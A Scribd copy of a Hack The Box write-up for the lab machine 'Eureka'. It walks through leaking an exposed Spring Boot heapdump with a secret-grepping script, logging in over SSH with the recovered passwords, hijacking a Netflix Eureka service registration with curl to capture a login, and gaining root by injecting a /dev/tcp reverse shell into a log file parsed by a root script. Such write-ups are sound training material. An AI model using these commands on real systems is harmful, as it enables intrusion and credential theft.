Scribd
Upload
5K views10 pages

Eureka - Write-Ups

The document details a penetration testing write-up for the Hack The Box machine 'Eureka'. It outlines the reconnaissance phase using tools like nmap and dirsearch, identifies vulnerabilities in the Spring Boot application, and describes the exploitation process to gain access to user and root accounts. Key findings include sensitive information leaks and the use of specific credentials to access the system and escalate privileges.

Uploaded by

peter.nechala
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
5K views10 pages

Eureka - Write-Ups

The document details a penetration testing write-up for the Hack The Box machine 'Eureka'. It outlines the reconnaissance phase using tools like nmap and dirsearch, identifies vulnerabilities in the Spring Boot application, and describes the exploitation process to gain access to user and root accounts. Key findings include sensitive information leaks and the use of specific credentials to access the system and escalate privileges.

Uploaded by

peter.nechala
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Write-Ups

🔋 HACK THE BOX 💻 MACHINES


⚜️ Eureka
https://app.hackthebox.com/machines/Eureka

Recon
Using the Scripts/Functions/Tools

nmap -sCV -T4 <ip> -oA <file>

1
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu
Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
| 256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_ 256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Adding new hosts

etc/hosts entry

10.129.242.192 eureka.htb furni.htb

Furni-Website

2
➜ eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: Deprecatio
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3


(_||| _) (/_(_|| (_| )

Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordl

Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_

Target: http://furni.htb/

[22:17:19] Starting:
[...]
[22:17:27] 200 - 2KB - /actuator
[22:17:27] 400 - 105B - /actuator/;/sso
[22:17:27] 400 - 115B - /actuator/;/springWebflow
[22:17:27] 400 - 112B - /actuator/;/statistics
[22:17:27] 400 - 113B - /actuator/;/ssoSessions
[22:17:27] 400 - 108B - /actuator/;/status
[22:17:27] 400 - 112B - /actuator/;/threaddump
[22:17:27] 400 - 107B - /actuator/;/trace
[22:17:27] 200 - 20B - /actuator/caches
[22:17:27] 200 - 6KB - /actuator/env
[22:17:27] 200 - 2B - /actuator/info
[22:17:27] 200 - 467B - /actuator/features
[22:17:27] 200 - 76MB - /actuator/heapdump
[22:17:27] 200 - 3KB - /actuator/metrics
[22:17:27] 200 - 54B - /actuator/scheduledtasks
[22:17:28] 200 - 198KB - /actuator/beans
[22:17:28] 400 - 108B - /actuator/sessions
[22:17:28] 405 - 114B - /actuator/refresh
[22:17:28] 200 - 96KB - /actuator/loggers
[22:17:29] 200 - 15B - /actuator/health
[22:17:29] 200 - 35KB - /actuator/mappings
[22:17:29] 200 - 180KB - /actuator/conditions
[22:17:29] 400 - 106B - /admin/%3bindex/
[22:17:30] 200 - 824KB - /actuator/threaddump
[22:17:30] 400 - 98B - /admin;/
[22:17:31] 400 - 98B - /Admin;/
[22:17:31] 200 - 36KB - /actuator/configprops
[...]

3
Leaking information because of misconfigured Spring Boot Acutators

http://furni.htb/actuator/env

Checking a common entry points list

/actuator/env
/actuator/auditevents
/actuator/beans
/actuator/caches
/actuator/configprops
/actuator/flyway
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/info
/actuator/integrationgraph
/actuator/liquibase
/actuator/configprops
/actuator/shutdown

We find a heapdump at http://furni.htb/actuator/heapdump

Using a script with the help of chat-gpt we find a password:

4
GNU nano 8.3
#!/bin/bash

# Usage check
if [ $# -lt 1 ]; then
echo "Usage: $0 <heapdump-file>"
exit 1
fi

HEAPDUMP="$1"
OUTPUT="sensitive_findings.txt"

# Colors
RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo "[*] Extracting and searching in $HEAPDUMP..."


echo "" > "$OUTPUT"

# Search for sensitive patterns


strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =

echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential se


echo

# Pretty print
while IFS= read -r line; do
if echo "$line" | grep -iq 'password\|passwd\|pwd'; then
echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}"
elif echo "$line" | grep -iq 'secret\|token\|key\|credential\|a
echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}$
elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}
echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}
elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\
echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}"
elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then
echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}"
else
echo -e "${YELLOW}[OTHER]${NC} $line"
fi
done < "$OUTPUT"

echo
echo "[*] Full results also saved in: $OUTPUT"

5
[..]
[PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!,
[..]

User
➜ eureka ssh oscar190@furni.htb
oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Sun 27 Apr 2025 09:00:04 PM UTC

System load: 0.0


Usage of /: 63.8% of 6.79GB
Memory usage: 47%
Swap usage: 0%
Processes: 244
Users logged in: 0
IPv4 address for eth0: 10.129.182.126
IPv6 address for eth0: dead:beef::250:56ff:fe94:4834

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.


Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71


oscar190@eureka:~$

We find another password in the application.yml of the eureka-server

6
oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password
name: "Eureka Server"

security:
user:
name: EurekaSrvr
password: 0scarPWDisTheB3st

server:
port: 8761
address: 0.0.0.0

nmap-full-scan
The full scan shows the other http-server eureka on port 8761 or like seen in
the command above

Eureka-Server
Using these credentials we can login

Create new fake service using this Hacking Netlix Eureka as example

Change YOURIP

7
curl -X POST
http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USE
R-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
"instance": {
"instanceId": "USER-MANAGEMENT-SERVICE",
"hostName": "YOURIP",
"app": "USER-MANAGEMENT-SERVICE",
"ipAddr": "YOURIP",
"vipAddress": "USER-MANAGEMENT-SERVICE",
"secureVipAddress": "USER-MANAGEMENT-SERVICE",
"status": "UP",
"port": { "$": 8081, "@enabled": "true" },
"dataCenterInfo": {
"@class":
"com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
"name": "MyOwn"
}
}
}'

After some time we get the User and Password on our listener

➜ eureka rlwrap nc -nlvp 8081


listening on [any] 8081 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338
POST /login HTTP/1.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1,127.0.0.1
X-Forwarded-Proto: http,http
Content-Length: 168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image
Accept-Language: en-US,en;q=0.8
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148"
X-Forwarded-Port: 80
X-Forwarded-Host: furni.htb
host: 10.10.14.71:8081
username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_c

Change the coding using cyberchef we get the user-flag

8
➜ eureka ssh miranda-wise@furni.htb
miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Thu 10 Apr 2025 07:41:57 AM UTC

System load: 0.04


Usage of /: 84.1% of 8.02GB
Memory usage: 44%
Swap usage: 0%
Processes: 248
Users logged in: 1
IPv4 address for eth0: 10.129.232.19
IPv6 address for eth0: dead:beef::250:56ff:feb9:f97

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.


Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts

Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71


miranda-wise@eureka:~$

Root
Checking for procs running with root privs show us a log_analyse.sh

ps -eo user,pid,comm | grep '^root'


[..]
root 4105259 log_analyse.sh
root 4105350 log_analyse.sh

9
Searching for log_analyse.sh

miranda-wise@eureka:/$ find . -name log_analyse.sh


find: ‘./boot/lost+found’: Permission denied
find: ‘./var/tmp/systemd-private-83645e554a1047198652b4
[..]
./opt/log_analyse.sh

In that file at analyze_http_statuses() we can

code=$(echo "$line" | grep -oP 'Status: \K.*')

miranda-wise@eureka:~$ rm -f /var/www/web/user-management-
service/log/application.log
miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >&
/dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-
service/log/application.log

➜ eureka rlwrap nc -nlvp 1337


listening on [any] 1337 ...

connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958


bash: cannot set terminal process group (1726439): Inappropriate ioc
bash: no job control in this shell
root@eureka:~#

Last updated 1 day ago

10

You might also like